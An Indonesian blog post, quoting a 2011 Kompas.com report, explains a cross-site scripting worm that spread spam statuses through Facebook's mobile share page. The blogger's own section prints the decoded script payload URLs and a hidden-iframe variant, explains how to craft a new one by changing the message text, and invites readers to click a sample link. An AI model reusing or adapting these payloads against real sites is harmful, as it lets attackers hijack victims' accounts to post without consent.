Waspada Virus Facebook Menyebar Lagi

30 Mar

Quantcast

https://i2.wp.com/stat.k.kidsklik.com/data/photo/2011/03/29/2026368620X310.JPG

Sepanjang Selasa (29/3/2011) pagi hingga sore tadi, para pengguna Facebook di Indonesia dihebohkan status kembar yang muncul otomatis di wall atau halaman depan akun masing-masing. Status yang disertai link berupa pemendek URL tersebut seperti virus yang menyebar cepat.

Setelah ditelusuri, menurut virus tersebut ternyata sudah menyebar sejak kemarin. Status muncul jika pengguna Facebook iseng-iseng mengklik link yang disertakan dalam status temannya. Saat diklik, pemendek URL tersebut akan mengarahkan situs web yang sebenarnya. Namun, dalam waktu yang bersamaan, muncul status yang sama di akun Facebook miliknya.

“Para pengguna Facebook dua hari belakangan ini dibingungkan oleh serangan script jahat yang memanfaatkan XSS (cross site scripting),” kata Alfons Tanujaya, ahli keamanan dan virus komputer dari Vaksincom, dalam e-mail-nya kepada Kompas.com. Ia mengatakan, halaman situs yang berada di dalam pemendek URL tersebut sengaja dipersiapkan pelaku dan saat korban berkunjung secara otomatis menjalankan perintah untuk mengeksploitasi XSS di Facebook.

Dari informasi yang diterima Kompas.com dari sejumlah sumber, kelemahan tersebut bersumber dari fitur Share di Facebook lewat versi mobile. Pelaku dapat menyisipkan script jebakan tersebut lewat fitur tersebut sehingga link URL yang diarahkan ke alamat tersebut akan otomatis menjalankan script untuk menampilkan pesan yang diinginkan di halaman akun korban.

Menurut Alfons, virus tersebut tidak mencuri password pengguna, namun hanya memanfaatkan kelamahan pengguna Facebook sehingga lolos bisa menulis halaman Facebook korban dengan bebas. Sejauh ini, aksi iseng tersebut memang tak berlanjut dengan aksi lanjutan dan hanya mengotori halaman alias menebar spam. Namun, untuk menghindari kemungkinan buruk mengganti password akun Facebook Anda secara rutin mungkin bisa jadi pilihan terbaik mencegah pencurian informasi.

Dari diskusi di halaman Share, virus tersebut rupanya sudah menyebar di dunia sejak tahun lalu. Banyak yang juga merasa terganggu dengan adanya spam yang menyebar lewat aplikasi tersebut. Anehnya, aplikasi Share tertulis bukan dibuka Facebook, namun saat dicek di daftar aplikasi yang digunakan pengguna agar dapat dimatikan, tidak tercantum nama aplikasi tersebut. Belum ada informasi dari Facebook untuk menjelaskan aplikasi Share ini.

Barusan saya melihat status orang yang hampir sama. Awalnya saya kira ini memanfaatkan aplikasi facebook. Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=function()document.forms%5B0%5D.message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms%5B0%5D.submit();%3C/script%3E

Huh …tinyurl-nya berfungsi untuk menyembunyikan javascriptnya :(
kalau kita decode jadilah seperti ini

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

Dasar orang isenk :( Bukan virus, tapi ya mengubah satus kita sesuai denan message value di atas.

Update : ini juga

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ini fotoku wkt lg ML http://tinyurl.com/rahasiapribadiku';document.forms[0].submit();}</script>

untuk membuat ini cukup mudah
cukup kopi link diatas kemudian ganti bagian message.value.
contoh :
ini testing dari mamakey http://tinyurl.com/mamakey
maka tertulis :

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’<script>window.onload%3Dfunction(){document.forms[0].message.value%3D’ini testing dari mamakey %3AD http%3A%2F%2Ftinyurl.com%2Fmamakey’%3Bdocument.forms[0].submit()%3B}<%2Fscript>’
Silahkan saja klik link diatas :D dan hapus pada wall anda

update lagi :

sekarang mereka tidak memakai tinyURL tapi memakai IFRAME untuk melakukan scripting.. huh jahat. Ketemu scriptnya disini :

<iframe id="CrazyDaVinci" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt=%27%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.forms%5B0%5D.message.value=%27Masih ada orang yg mau terkenal dan kaya raya dengan memuja setan, termasuk salah satu grup band terkenal di Indonesia ckckckck.... baca selengkapnya di http://tinyurl.com/4fqudco %21%21%21%27;document.forms%5B0%5D.submit%28%29;%7D%3C/script%3E" style="display: none;"></iframe>
terima kasih Fuad for pointing me :)

SUMBER

Iklan

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: